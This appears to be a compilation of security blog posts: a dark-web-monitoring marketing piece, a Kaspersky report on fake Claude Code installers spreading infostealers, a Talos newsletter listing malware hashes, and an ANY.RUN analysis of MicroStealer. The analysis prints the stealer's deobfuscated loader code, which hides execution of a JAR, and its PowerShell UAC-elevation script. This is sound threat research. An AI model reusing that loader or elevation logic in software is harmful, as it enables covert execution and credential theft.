Recent data from Cyble Research and Intelligence Labs (CRIL) shows the scale of this threat. In 2025 alone, Cyble tracked 6,046 global data breach and leak incidents, with sectors such as government and finance among the most targeted. The research has also identified thousands of enterprise credentials circulating on dark web marketplaces, often harvested by infostealer malware and sold to cybercriminals. 

For organizations that want to protect sensitive data, maintain reputation, and reduce operational risk, investing in dark web intelligence and dark web monitoring solutions is no longer optional; it’s a necessity. 

What Is Dark Web Monitoring and Why It Matters in 2026 

Dark web monitoring involves continuous scanning and intelligence gathering from hidden parts of the internet that aren’t indexed by traditional search engines, including TOR, I2P, ZeroNet, and encrypted chat channels. Cybercriminals use these platforms to trade stolen data, discuss exploits, and plan attacks. 

Effective dark web surveillance allows organizations to detect threats early. By identifying stolen credentials, leaked data, and malicious activity before the attacker acts, security teams can reset passwords, notify affected personnel, and fortify defenses, turning reactive security into a proactive advantage. 

How the Dark Web Has Evolved as a Threat Landscape 

Once considered a fringe network, the dark web has become a structured ecosystem for cybercrime. Threat actors collaborate globally with the same levels of sophistication as legitimate enterprises, complete with forums for selling vulnerabilities, reputation systems for traders, and encrypted channels for planning attacks. 

From ransomware kits to stolen databases and insider trading in sensitive corporate data, the dark web now functions as a hub for criminal collaboration and the commercialization of cyberattacks. Organizations that ignore this underground economy risk being blindsided. 

What Kind of Data Ends Up on the Dark Web 

Not all information on the dark web carries the same risk, but much of it is highly sensitive: 

  • Stolen credentials: Email/password combinations, VPN logins 

  • Breached corporate databases: Financial, HR, and client information 

  • Identity documents: Social Security numbers, passports 

  • Internal communications or proprietary IP 

Even seemingly minor leaks, if unnoticed, can be exploited for data breaches. Platforms with data leak monitoring and dark web alerts allow teams to act before these threats escalate. 

How Dark Web Monitoring Works 

Modern dark web monitoring relies on a combination of automated technologies and expert analysis. Tools crawl hidden networks, marketplaces, paste sites, and private forums to collect data. AI and machine learning analyze signals, identify patterns of malicious behavior, and provide cyber threat intelligence in actionable formats. 

Key capabilities include: 

  • Deep web and dark web scanning: Covering TOR, I2P, and other hidden networks 

  • Threat actor tracking: Linking chatter to known malicious entities 

  • Natural Language Processing (NLP): Interpreting unstructured forum text 

  • Actionable alerts: Prioritized intelligence for immediate response 

This ensures organizations can anticipate threats rather than merely respond after an incident. 

Key Features to Look for in a Dark Web Monitoring Solution 

In 2026, an effective platform should offer: 

  • Continuous, real-time scanning 

  • Comprehensive monitoring of marketplaces, forums, and paste sites 

  • Automated alerts with remediation guidance 

  • Integration with existing cybersecurity systems 

  • Reporting for compliance and risk assessment 

  • Threat actor profiling and predictive analytics 

Solutions lacking contextual intelligence or actionable insights are insufficient for modern threat landscapes. 

Cyble Hawk for Advanced Threat Intelligence and Protection 

To counter cyber threats from advanced adversaries, Cyble Hawk represents the next generation of dark web monitoring and threat intelligence. Beyond merely detecting leaks, Cyble Hawk tracks threat actors, uncovers emerging attack trends, and provides actionable insights across cyber and physical domains. 

Key advantages of Cyble Hawk include: 

  • Deep Intelligence Fusion: Integrates open-source and proprietary intelligence for a 360-degree view of threats. 

  • AI & Deep Learning: Identifies threat actors and patterns in real time. 

  • Real-Time Alerts & Rapid Response: Immediate notifications for compromised credentials, breaches, and vulnerabilities. 

  • Incident Response & Resilience: Supports frameworks to continuously strengthen the cybersecurity posture. 

Cyble Hawk doesn’t just monitor; it empowers organizations to detect, respond, and protect against the most advanced cyber threats before they escalate. 

Dark Web Monitoring Across Industries 

Different sectors face unique exposures, and tailored monitoring is critical: 

  • Financial Services: Detect compromised customer databases, prevent fraud schemes 

  • Healthcare: Identify patient data leaks, PHI exposure, and ransomware chatter 

  • Retail & E-Commerce: Monitor credential-stuffing lists, card dumps, and phishing campaigns 

  • Manufacturing & Critical Infrastructure: Track trade-secret exposure and APT activity 

  • Government & Public Sector: Detect contractor data leaks, APT campaigns, and impersonation threats 

Building a Dark Web Monitoring Strategy in 2026 

A robust strategy combines continuous monitoring with proactive response: 

  1. Asset Prioritization: Identify the most critical data, accounts, and intellectual property 

  1. Continuous Intelligence Gathering: Real-time scanning of forums, marketplaces, and paste sites 

  1. Automated, Actionable Alerts: Ensure teams can respond quickly to compromised assets 

  1. Integration with Cybersecurity Infrastructure: Link dark web intelligence with firewalls, identity protection, and incident response tools 

  1. Employee Awareness: Educate staff to recognize phishing and social engineering attempts 

This approach transforms dark web intelligence into a defensive advantage, reducing exposure and operational risk. 

Frequently Asked Questions (FAQs) 

Q.1: What is dark web intelligence? 

Intelligence is collected from unindexed networks and underground forums to detect threats, leaked data, or compromised credentials. 

Q.2: Can dark web monitoring prevent attacks? 

It doesn’t prevent breaches outright, but early detection of leaks or malicious activity enables mitigation before exploitation. 

Q.3: Who should use dark web monitoring? 

Any organization handling sensitive data, including enterprises, government agencies, and financial institutions. 

Q.4: How does Cyble Hawk enhance monitoring? 

By combining AI, threat actor tracking, and real-time alerts, Cyble Hawk delivers actionable intelligence that allows organizations to detect, respond, and fortify defenses effectively. 

Conclusion 

In 2026, the dark web remains one of the most dynamic and high-risk areas of the cyber threat landscape. Organizations can no longer afford to rely on reactive security. By leveraging advanced monitoring platforms like Cyble Hawk, security teams gain early visibility into compromised data, track threat actors, and respond to risks before they escalate into major incidents. 

Cyble Hawk combines AI-driven intelligence, real-time alerts, and expert threat analysis to help organizations detect threats faster and strengthen their cybersecurity posture. Schedule a personalized demo to see Cyble Hawk in action and learn how it can help protect your organization’s critical assets. 

The post The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike appeared first on Cyble.

Cyble – ​Read More

Cyber fallout from the Iran war: What to have on your radar

The cybersecurity implications of the war in the Middle East extend far beyond the region. Here’s where to focus your defenses.

WeLiveSecurity – ​Read More

AMOS and Amatera disguised as AI agents | Kaspersky official blog

We recently discussed how malicious actors are spreading the AMOS infostealer for macOS via Google Ads, leveraging a chat with an AI assistant on the actual OpenAI website to host malicious instructions. We decided to dig a little deeper, only to discover several similar malicious campaigns where attackers attempt to slip users malware disguised as popular AI tools through Google Search ads. If the victims are searching for macOS-specific tools, the payload deployed is the very same AMOS; if they’re on Windows, it’s the Amatera infostealer instead. These campaigns use the popular Chinese AI Doubao, the viral AI assistant OpenClaw, or the coding assistant Claude Code as bait. This means such campaigns pose a threat not only to home users but also to organizations.

The reality is that corporate employees are increasingly using coding assistants like Claude Code, and workflow automation agents like OpenClaw. This brings its own set of risks, which is why many organizations have yet to officially approve (or pay for) access to such tools. Consequently, some employees take matters into their own hands to find these trendy tools, and head straight to Google. They type in a search query and are served a sponsored link leading to a malicious installation guide. Let’s take a closer look at how this attack plays out, using a Claude Code distribution campaign discovered in early March as an example.

The search query

So, a user starts looking for a place to download the Anthropic agent and types something like “Claude Code download” into the search bar. The search engine returns a list of links, with “sponsored links” (paid advertisements) sitting at the top. One of these ads leads the user to a malicious page featuring fake documentation. Interestingly, the site itself is built on Squarespace, a legitimate website builder that helps it bypass anti-phishing filters.

Search result examples

Search results with ads in Romania and Brazil

The attackers’ site meticulously mimics the original Claude Code documentation, complete with installation instructions. Just like the real deal, it prompts the user to copy and run a command. However, once executed, it installs not an AI agent but malware. Essentially, this is just another flavor of the ClickFix attack — one that has earned its own nickname: InstallFix.

Malicious website

Malicious site mimicking installation instructions

Claude Code website

Genuine Claude Code site with installation instructions

Malicious payload

Just like with the original Claude Code, the command for macOS attempts to install an application using the curl command-line utility. In reality, it deploys the AMOS spyware — previously described by our experts on Securelist — which was used in a similar past campaign.

In the case of Windows, the malware is installed using the system utility mshta.exe, which executes HTML-based applications instead of curl, which is used for the genuine Claude Code. This utility deploys the Amatera infostealer, which harvests browser data, crypto-wallet info, as well as information from the user folder, and sends it to a remote server at 144{.}124.235.102.

How to keep your company safe

Interest in AI agents continues to grow, and the emergence of new tools and their rising popularity are creating fresh attack vectors. Specifically, attempting to seek out third-party AI tools can not only jeopardize the source code of projects on the victim’s computer but also lead to the compromise of secrets, confidential corporate files, and user accounts.

To prevent this from happening, the first step should be educating employees about these dangers and the tricks used by threat actors. This can be done using our training platform: Kaspersky Automated Security Awareness. Incidentally, it includes a specialized lesson on the use of AI in corporate environments.

Additionally, we recommend protecting all corporate devices with proven cybersecurity solutions.

We also suggest checking out our previously published article on three approaches to minimizing the risks of using shadow AI.

Kaspersky official blog – ​Read More

This one’s for you, Mom

This one’s for you, Mom

Welcome to this week’s edition of the Threat Source newsletter. 

I am the product of a single parent, my mom, who along with my grandparents helped raise me into the man I am today.  I cannot fathom what it took for my mom, who worked three jobs to put herself through college to be a teacher, to struggle through it. My grandparents did some heavy lifting here, helping with me as a kid as my mom worked long hours and earned her bachelor’s degree.  

I didn’t see as much of my mom as I wanted — but in her third job where she cleaned offices on the weekend, I would often go with her and help. It got me out of the house, let me spend time with my mom, and afterwards we’d have a meal together. Shout out to the Taco Bell dollar menu, which was all we could afford. It took me well into my thirties to understand how important that time we shared was, even as I took out garbage, cleaned bathrooms, and complained the entire time.  

So why am I waxing nostalgic for my childhood janitorial days? Role models. My mom is certainly one. We also recently recognized International Women’s Day here at Talos, and I couldn’t help but think of the sacrifices and hard work my mom did to ensure I had food and clothing and was loved. It caused me to reflect on the women who work in my career space, especially here at Cisco. What parallels exist? What don’t I know about? How can I be an ally? I had previously observed that cybersecurity is a male-dominated field, but I hadn’t really dug into any data to support that. It also made me wonder: What other STEM fields suffered from a lack of, or had successes in, gender diversity?  

So I did some homework to better understand. Some sobering stats: 

Well, that was depressing. I knew it wasn’t great, but geez. 

Even though I’m a bit slow, I did find some good news. There are a lot of fantastic organizations, programs, and scholarships to help women attain skills and get great jobs in STEM, especially in cybersecurity. I’m quite partial to CTFs and competitions in this space — it’s valuable hands-on experience, and having fun hacking stuff in a safe and inclusive space is fantastic. I’m also fond of Women in Cybersecurity (WiCyS). I’ve been fortunate to do WiCyS mentorship here in Cisco, and it was an awesome experience.

Should you find yourself in a position to mentor someone that would add diversity into our career space, do it! It is incredibly rewarding. A diversity of thoughts and lived experiences make us and those we protect safer — which is what we do all day, every day here in Talos.

The one big thing 

On Tuesday, March 10, Talos updated our blog on the developing situation in the Middle East. We continue to monitor the evolving cyber threat landscape associated with the conflict and collect tactics, techniques, and procedures (TTPs); threat actor identifiers; and other intelligence to help inform defensive efforts and maintain situational awareness. 

Though select hacktivist operations are highlighted in the blog, hundreds of attacks have been claimed by numerous collectives since the beginning of the conflict. Talos cautions against accepting these claims at face value, emphasizing that defenders should independently verify them since older leaks and previously public information can be used to influence perceptions.

Why do I care? 

Cyber operations are likely to play a supporting but strategically significant role in the ongoing conflict. Iranian-aligned groups are employing network-based intrusions to target adversary infrastructure and advance strategic objectives.  

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Disruptive cyberattacks against organizations in a target country may unintentionally spill over to organizations in other countries. A more active hacktivist landscape inherently increases the threat of DDoS and website defacement attacks, as hundreds of attacks have been claimed by numerous collectives since the beginning of the conflict. 

So now what? 

Organizations should increase vigilance and evaluate their capabilities encompassing planning, preparation, detection, and response for destructive malware. Consider minimizing the amount and sensitivity of data that is available to external parties. To improve defenses against DDoS attacks, ensure your organization has a business continuity plan in place, assess external attack surfaces, and confirm that critical systems have healthy, usable backups. For website defacement/redirect protection, ensure that websites are protected against the most commonly exploited security vulnerabilities.  

Defenders should ensure security fundamentals are being adhered to, such as robust patching for known vulnerabilities and requiring multi-factor authentication (MFA) for remote access and on critical services. Network security teams should proactively monitor their traffic for APT-associated IP addresses and implement hardening guidelines.  

We will update this blog with IOCs and further developments accordingly. 

Top security headlines of the week 

Russian government hackers targeting Signal and WhatsApp users, Dutch spies warn 
Two agencies accused “Russian state actors” of using phishing and social engineering techniques — rather than malware — to take over accounts on the two messaging apps. (TechCrunch

FBI investigating “suspicious” cyber activities on critical surveillance network 
The FBI has identified a suspected cybersecurity incident on a sensitive network used to manage wiretaps and intelligence surveillance warrants. Officials are working to determine the seriousness of the incident. (CNN

TriZetto confirms year-long hack of its network exposed records on 3.4M people 
Until recently, the total number of impacted individuals was unknown. According to a recent filing with the Office of the Maine Attorney General, the breach likely initially occurred on November 19, 2024. (HealthExec

“InstallFix” attacks spread fake Claude Code sites 
A fresh cyber attack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces. (Dark Reading

ClickFix attack uses Windows Terminal to evade detection 
Victims are instructed to open Windows Terminal directly, instead of relying on the Windows Run dialog. The new approach, observed in the wild in February, allows attackers to bypass protections designed to prevent Run dialog abuse. (Dark Reading

Can’t get enough Talos? 

It’s the B+ Team: Matt Olney returns 
Matt is back to talk with the crew about about the most random things, including TikTok diagnosing us with ADHD, K-Pop Demon Hunters, ransomware in hospitals (the serious bit), attacker use of AI, and why 1999-era tricks are still undefeated.

Modernizing your threat hunt 
David Bianco joins Amy to explore the evolution of the PEAK Threat Hunting framework and talk through how security teams can modernize their approach to identifying risks before they escalate.

Spinning complex ideas into clear docs with Kri Dontje 
Kri and Amy discuss the importance of consistency, accuracy, and accessibility in documentation; how to get the most out of a subject matter expert-technical writer relationship; and the surprising connection between weaving and binary code.

Agentic AI security 
This blog emphasizes the importance of robust risk management and threat modeling to defend against both internal operational errors and potential malicious exploitation. 

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Example Filename: https_2915b3f8b703eb744fc54c81f4a9c67f.exe 
Detection Name: Win.Worm.Coinminer::1201  

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
Example Filename: d4aa3e7010220ad1b458fac17039c274_64_Dll.dll 
Detection Name: Auto.90B145.282358.in02  

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
MD5: aac3165ece2959f39ff98334618d10d9 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe 
Detection Name: W32.Injector:Gen.21ie.1201  

SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
MD5: 41444d7018601b599beac0c60ed1bf83 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js 
Detection Name: W32.38D053135D-95.SBX.TG 

SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
MD5: a2cf85d22a54e26794cbc7be16840bb1 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
Example Filename: VID001.exe 
Detection Name: W32.5E6060DF7E-100.SBX.TG

Cisco Talos Blog – ​Read More

MicroStealer Analysis: A Fast-Spreading Infostealer with Limited Detection 

Security teams depend on early signals to spot and contain new threats. But what happens when a fully capable infostealer spreads while traditional detections stay limited? 

In recent investigations, ANY.RUN researchers observed MicroStealer in 40+ sandbox sessions in less than a month, despite low public visibility. Early activity points to distribution through compromised or impersonated accounts, with education and telecommunications among the affected sectors.

MicroStealer is more than just another stealer. It targets browser credentials, session data, screenshots, and wallet files while using a layered NSIS → Electron → Java delivery chain that can slow confident detection.

Let’s break down how MicroStealer operates and how its behavior can be uncovered early in ANY.RUN’s interactive sandbox, helping teams shorten time to verdict, reduce unnecessary escalations, and prevent credential theft from becoming a business impact.

Key Takeaways 

  • MicroStealer exposes a broader business risk by stealing browser credentials, active sessions, and other sensitive data tied to corporate access.
  • The malware uses a layered NSIS → Electron → JAR chain that helps it stay unclear longer and slows confident detection.
  • Distribution through compromised or impersonated accounts makes the initial infection look more trustworthy to victims.
  • For enterprises, the main danger is delayed visibility while identity compromise and data theft are already in progress. 

The Business Risk Behind MicroStealer 

For security leaders, MicroStealer reflects a threat designed to steal identity data, maintain access, and increase the chance of a wider enterprise incident. 

  • Corporate identities become exposed: Browser credential theft and session cookie extraction compromise SaaS accounts, internal portals, VPN sessions, and cloud administration access tied to employee browsers.
  • Privilege expansion becomes possible: Access to authentication tokens, browser sessions, and system credentials creates a path from a single compromised endpoint to privileged accounts and internal systems.
  • Stealthy access persists longer: Stolen session data allows attackers to operate through valid user sessions, blending malicious activity with legitimate traffic across enterprise services.
  • Data loss begins immediately: Screenshots, browser data, wallet files, and application artifacts are collected and exfiltrated through multiple channels, ensuring sensitive information leaves the environment quickly.
  • Attackers gain reconnaissance value: Profiling of Discord and Steam accounts provides intelligence about the victim’s activity, helping attackers prioritize higher-value targets.

For CISOs, MicroStealer highlights a familiar enterprise risk: attackers can use stolen identities, stealthy delivery methods, and fast data theft to stay undetected, expand access inside the environment, and increase the risk of operational, compliance, and reputational damage.

Gain earlier visibility
into emerging threats
Reduce the risk of corporate credential compromise
 



Power up your SOC


Timeline of Observed MicroStealer Activity 

MicroStealer activity was first observed on December 14 during the analysis of the following analysis session inside ANY.RUN sandbox:

Check analysis session  

First observed analysis session with MicroStealer 

Over the following period, its activity continued to grow, and at the time of analysis it had already been identified in more than 40 sandbox sessions in less than one month, indicating an active distributionphase. 

However, despite the malware’s growing popularity, security vendors are still not detecting MicroStealer.

Security vendors don’t flag the file as malicious 
Security vendors don’t flag the file as malicious 

The highest concentration of detections was observed between January 7 and January 11, when 20 sandbox sessions containing MicroStealer activity were recorded. This suggests that MicroStealer is gaining traction. 

Catch emerging threats in
under 60 seconds

Reduce time to verdict with clear behavioral evidence
 



Register now


When visiting the malicious resource, the victim is presented with a visually appealing website: 

Attacker-controlled website
Attacker-controlled website analyzed inside ANY.RUN sandbox 

When the “Download Now” button is clicked, a JavaScript file is executed. It downloads a malicious file from Dropbox and sends the victim’s external IP address, region, OS version, and time zone to a Discord server.

This basic information serves as a beacon. However, if the downloaded malicious file is executed, MicroStealer steals data from web browser profiles, takes desktop screenshots, and sends the collected data as an archive to two destinations: a Discord server and a newly registered exfiltration server.

In this way, the stealer increases the chances that the stolen data will reach the attacker even if one of the servers becomes unavailable for some reason.

MicroStealer also uses the same name in its User-Agent header during the first GET request to Discord:

User-Agent: MicroStealer/1.0 

In addition to Dropbox, there were also cases where the sample was downloaded from other sources, for example: cdn[.]discordapp[.]com 

Victimology and Targeting 

Analysis of MicroStealer-related submissions to the ANY.RUN sandbox shows that 50% of observed sample uploads originated from the United States and Germany, pointing to notable activity in these regions.

Based on the observed cases, the education and telecommunications sectors appear to face elevated exposure. 

threatName:”microstealer” 

ANY.RUN’s TI Lookup shows the risk score by industry and submission countries 
ANY.RUN’s TI Lookup shows the risk score by industry and submission countries 

The distribution pattern also suggests that threat actors rely on compromised or impersonated accounts to deliver the malware, increasing the likelihood that victims will trust the source and execute the payload. 

See if emerging threats
are targeting your industry and region
Strengthen proactive defense with TI Lookup
 



Start now


Inside the MicroStealer Execution Chain 

The ANY.RUN sandbox provides a clear overview of the MicroStealer execution chain and detects the malware’s primary behavioral patterns, making it easier to begin the analysis.

Running the MicroStealer Sample in ANY.RUN 
Running the MicroStealer Sample in ANY.RUN 

To better understand how each component operates, the analysis proceeds with static analysis. The first stage in the infection chain is RocobeSetup.exe.

RocobeSetup is an NSIS installer (Nullsoft Scriptable Install System), which becomes immediately apparent when analyzing the binary using Detect It Easy (DIE) (Detect It Easy).

Sample Analysis in Detect It Easy 
Sample analysis in Detect It Easy 

Since the installer has an archive structure, its contents can be inspected without executing the malware or using specialized analysis tools.

Analysis of the NSIS Installer Contents 
Analysis of the NSIS Installer contents 

Among the files, the next stage in the infection chain can already be identified: Game Launcher.exe. The analysis then moves on to the other directories within the archive.

Inside the resource directory, two ASAR archives (Atom Shell Archive) can be found: app.asar and app.asar.unpacked. The latter contains the **main stealer module, an executable JAR file, along with a Java Runtime Environment (JRE), packaged inside the archive module.zip.

Analysis of the ASAR ArchiveContents 
Analysis of the ASAR ArchiveContents 
Analysis of the ASAR archive contents 

After unpacking app.asar using a standard ASAR unpacker, a small Node.js component becomes visible.

Analysis and Unpacking of app.asar 
Analysis and unpacking of app.asar 

Static Analysis of the Node.js Component 

At this stage, the focus shifts to the main script located in index.js. Opening it in a text editor immediately reveals multiple signs of obfuscation, including compressed strings, constants grouped into arrays, flattened control flow, and dead code.

The next step is to analyze the string handling logic, since strings are used extensively throughout the program and can help reconstruct the malware’s execution flow.

To understand how the malware retrieves the strings it needs, let us examine the following code block:

var wa4Ibtk; 
(function () { 
function* mjAYxpv(mjAYxpv, JbBfOsP, PXuU6i, Tky9na = { 
rwLytg: {} 
}) { 
while (mjAYxpv + JbBfOsP + PXuU6i !== 124) with(Tky9na.bWzSK3 || Tky9na) switch (mjAYxpv + JbBfOsP + PXuU6i) { 
default: 
[Tky9na.rwLytg.sZF0hF, Tky9na.rwLytg.MtsKAJ, Tky9na.rwLytg.AggjBE] = [-57, -181, 104]; 
Tky9na.bWzSK3 = Tky9na.TDHlw5, mjAYxpv += -134, JbBfOsP += 290, PXuU6i += 145; 
breakcase 162: 
case PXuU6i - -62: 
Tky9na.bWzSK3 = Tky9na.Q6N0rF, mjAYxpv += -340, JbBfOsP += 290; 
breakcase Tky9na.rwLytg.AggjBE + -186: 
Tky9na.bWzSK3 = Tky9na.IQz1SBX, mjAYxpv += -211, JbBfOsP += 290; 
breakcase -216: 
case 9: 
case -78: 
case 60: 
case PXuU6i - 190: 
case -96: 
[Tky9na.rwLytg.sZF0hF, Tky9na.rwLytg.MtsKAJ, Tky9na.rwLytg.AggjBE] = [-62, 172, 231]; 
rwLytg.DDXChP = "ɡⱃ¼ǀ⼡砫\ư෠祘ഀΠ䌡渡洀ં䊡䚐ɰଊ‥<䜀ྀᕩö (...truncated)"; 
rwLytg.tuWPH66 = cIb9x8P.decompressFromUTF16(rwLytg.DDXChP); 
Tky9na.bWzSK3 = Tky9na.rwLytg, mjAYxpv += -83, JbBfOsP += 227, PXuU6i += -441; 
breakcase 40: 
case 235: 
case mjAYxpv - -42: 
Tky9na.rwLytg.zxxO0HE = tuWPH66.split("|"); 
return oh5cES = !0, wa4Ibtk = function (mjAYxpv) { 
return zxxO0HE[mjAYxpv] 
} 
} 
} 
var oh5cES, JbBfOsP = mjAYxpv(-31, -159, 415).next().value; 
if (oh5cES) { 
return JbBfOsP 
} 
})(); 

As we can see, all strings are combined and compressed using the LZ-String library into a single sequence of Unicode characters, stored in the variable DDXChP (for example, “ɡⱃ¼ǀ⼡砫ư෠祘ഀΠ䌡渡洀…”).

To restore them, the malware uses the decompressFromUTF16 method: rwLytg.tuWPH66 = cIb9x8P.decompressFromUTF16(rwLytg.DDXChP); 

This means that the value stored in DDXChP is the result of UTF-16-based compression. The obfuscator may reference the library under a different name, such as cIb9x8P, but the logic remains the same: the original string data is reconstructed from the compressed sequence.

After decompression, the resulting string is split using the | delimiter: Tky9na.rwLytg.zxxO0HE = tuWPH66.split(“|”); 

A specific string is then retrieved by index through a getter function

wa4Ibtk = function (mjAYxpv) { 
    return zxxO0HE[mjAYxpv]; 
}; 

Later, the malware references these strings through calls such as wa4Ibtk(3), wa4Ibtk(7), and wa4Ibtk(11), where the argument represents an index in the zxxO0HE array.

After removing the unnecessary junk code, this logic can be represented in the following simplified form:

var GetString; 
(function InitializeStringTable() { 
var compressed = "ɡⱃ¼ǀ⼡砫\ư෠祘ഀΠ䌡渡洀 (...truncated)"; 
var decompressed = lzObject.decompressFromUTF16(compressed); 
 
stringTable = decompressed.split("|"); 
GetString = function (index) { 
return stringTable[index]; 
}; 
})(); 

Next, we copy the lzObject implementation from the target script and run the resulting function in a separate script. This makes it possible to extract all strings used by the program. Since the total number of recovered strings is quite large, only some of the most interesting examples are shown below, along with their indices.

Note that many strings are truncated and concatenated directly in the code. Their full values are provided in parentheses:

[2]  spawn 
[3]  exec 
[59] env 
 
[11-25] 
    try { 
        Start-Process -FilePath " -ArgumentList '--install' -Verb RunAs 
        Stop-Process -Id 
        exit 0 
    } catch { 
        exit 1 
    } 
 
[35-41] powershell -ExecutionPolicy Bypass -NoProfile -NonInteractive -File " 
 
[27]    tmpdir 
[32-34] writeF + ileSyn (writeFileSync) 
[54-55] unlink + Sync (unlinkSync) 
[79]    exists 
[107-108] readFi + leSync (readFileSync) 
 
[60-65] LOCALA + PPDATA → USERPR + OFILE → AppDat + a + Local (LOCALAPPDATA / USERPROFILE / AppDataLocal) 
[66]    soft.j (soft.jar) 
[67]    model 
[68]    jre 
[69]    bin 
[70-71] miicro + soft.e (miicrosoft.exe) 
[73-74] resour + cesPat (resourcesPath) 
[76-78] app.as + ar.unp + acked (app.asar.unpacked) 
[81-82] model. + zip (model.zip) 
 
[128]   -jar 
[129-132] detach (detached), stdio, ignore, unref 
[140-141] --inst + all (--install) 

Let us now examine the obfuscated code fragments that implement the logic for launching the main payload, which is distributed in JAR format: 

    const mjAYxpv = [0, null, 32, 2, 1, 256, 6, 3, 8, 16, 4, "undefined", "LZString", "=", " ", ";", "\\", 15, 30, """, !1, !0, void 0, 26, 59, 10, 73, 74, "h", 55, 66,"ar", 79, 1023, 65536, 55296, 56320, 63, 31, 12, 18, 7, 128, 192, "e", 91, 92, 93, 255, 224, 240, 97, 98, 99, 100, "d", 33, "c", ")", 106, 107, 108, "g", 24, 60, 1000]; 
 
    // ... 
 
    const Tky9na = require("fs"), 
    _LLSkL = require("path"), 
    { 
        [wa4Ibtk(mjAYxpv[3])]: E5NpXn, 
        [wa4Ibtk(mjAYxpv[7])]: TD4p2BE 
    } = require("child_process"), 
    peB9yJ = require("os"), 
    OnZdH7B = require("adm-zip"); 
 
    // ... 
 
    const JbBfOsP = process[wa4Ibtk(mjAYxpv[24])][wa4Ibtk(mjAYxpv[64]) + wa4Ib(61)] || _LLSkL[wa4Ibtk(mjAYxpv[23])](process[wa4Ibtk(mjAYxpv[24])][wa4Ibtk(62) +wa4Ibtk(mjAYxpv[37])], wa4Ibtk(64) + "a", wa4Ibtk(65)), 
        TD4p2BE = _LLSkL[wa4Ibtk(mjAYxpv[23])](JbBfOsP, wa4Ibtk(mjAYxpv[30]) + mjAYxpv[31]), 
        peB9yJ = _LLSkL[wa4Ibtk(mjAYxpv[23])](JbBfOsP, wa4Ibtk(67), wa4Ibtk(68), wa4Ibtk(69), wa4Ibtk(70) + wa4Ibtk(71) + "xe"); 
 
    // ... 
 
    const vWOBncd = E5NpXn(peB9yJ, [wa4Ibtk(mjAYxpv[42]), TD4p2BE], { 
        [wa4Ibtk(129) + "ed"]: mjAYxpv[21], 
        [wa4Ibtk(130)]: wa4Ibtk(131), 
        [wa4Ibtk(mjAYxpv[24])]: process[wa4Ibtk(mjAYxpv[24])] 
    }); 
    vWOBncd[wa4Ibtk(132)](); 
    process[wa4Ibtk(mjAYxpv[59])](mjAYxpv[0]) 

After removing the junk code and substituting the resolved strings, this logic can be represented in the following much more readable form: 

const fs = require("fs"); 
const path = require("path"); 
const { spawn, exec } = require("child_process"); 
const os = require("os"); 
const AdmZip = require("adm-zip"); 
 
const baseDir = 
    process.env.LOCALAPPDATA || 
    path.join(process.env.USERPROFILE, "AppData", "Local"); 
 
const jarPath = path.join(baseDir, "soft.jar"); 
 
const javaExePath = path.join( 
    baseDir, 
    "model", 
    "jre", 
    "bin", 
    "miicrosoft.exe" 
); 
 
const child = spawn( 
    javaExePath, 
    ["-jar", jarPath], 
    { 
        detached: true, 
        stdio: "ignore", 
        env: process.env 
    } 
); 
 
child.unref(); 
 
process.exit(0); 

The malware then extracts an embedded JRE, disguises the executable as miicrosoft.exe, launches the JAR file in the background, and immediately terminates the main Node.js process, allowing the payload to continue running independently.

Confirm real attacker activity faster

Prevent suspicious files from turning into enterprise incidents 



Contact us


Breaking Down the Execution Chain 

As part of its execution chain, the malware also attempts to obtain elevated privileges. This stage is not analyzed in detail here, as it relies primarily on social engineering: the victim is simply presented with a UAC prompt that is likely to be perceived as a normal part of the installation process. 

The PowerShell script used for this step is shown below: 

try { 
    Start-Process -FilePath "Game Launcher.exe" -ArgumentList '--install' -Verb RunAs 
    Stop-Process -Id (pid) 
    exit 0 
} catch { 
    exit 1 
} 

At this stage, the role of Game Launcher.exe becomes clear. The presence of the resources directory containing an ASAR archive and a Node.js project indicates the use of Electron. Analysis in Ghidra confirms this: a modal window prompts to load electron.pdb, and both the strings and the entry point contain characteristic Electron artifacts.

Strings from the Electron framework
Strings from the Electron framework in the disassembler confirm that Electron is used in the binary. 

Ultimately, Game Launcher.exe is an Electron application used as part of the malware delivery chain. The execution flow is as follows: 

  • NSIS (RocobeSetup.exe): An archive installer containing the malicious payload 
  • Electron (Game Launcher.exe): Requests administrator privileges through UAC 
  • Electron (Game Launcher.exe –install): Extracts and launches the JAR file 
  • Java (miicrosoft.exe -jar soft.jar): Executes the main malicious logic 

The combination of an NSIS installer and Electron significantly complicates the static analysis of the malware. Electron can directly read and execute JavaScript code from an ASAR archive without extracting it to the file system, bypassing traditional signature-based detection mechanisms

At the same time, the NSIS installer ensures that the malicious files remain unavailable for analysis or detection until the installer itself finishes execution. 

Static Analysis of the Java Module 

The next step is to analyze the main module by loading the JAR file into a disassembler. Once again, we encounter obfuscated code; this time on the Java side. As with the Node.js component, the strings are encrypted and recovered through helper functions. A representative fragment is shown below:

